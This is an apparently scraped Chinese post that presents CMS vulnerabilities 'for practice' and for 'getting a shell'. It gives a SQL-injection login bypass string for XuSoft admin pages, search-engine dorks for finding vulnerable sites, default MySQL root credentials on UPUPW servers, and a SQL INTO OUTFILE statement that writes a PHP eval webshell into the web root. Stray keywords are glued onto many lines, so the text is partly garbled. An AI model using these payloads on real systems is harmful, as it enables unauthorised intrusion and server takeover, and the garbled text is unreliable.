一些CMS網站系統漏洞,練手用(持續更新)

僅供拿shell,提權測試用,請勿惡意破壞php

 

XuSoft系統:sql

後臺萬能密碼:'or'='or'  可直接登錄,後臺地址 /manage/login.aspshell

inurl:ReadArticlemb.asp?id=服務器

inurl:ReadBigClassmb.asp?id=測試

inurl:ReadBigClassmbNews.asp?id=url

 
 

UPUPW綠色服務器平臺:spa

服務器基本上是2008,system權限ip

MySQL 默認用戶名密碼:root ,進入後臺直接執行SQL語句寫shellclass

PHP探針-UPUPW綠色服務器平臺KANGLE專用版後臺

 
© 2015 WWW.UPUPW.NET 版權全部
 

sql寫shell

select '<?php @eval($_POST['geeking.cc']);?>'INTO OUTFILE 'D://upupw//htdocs//gekking.php'

相關文章
相關標籤/搜索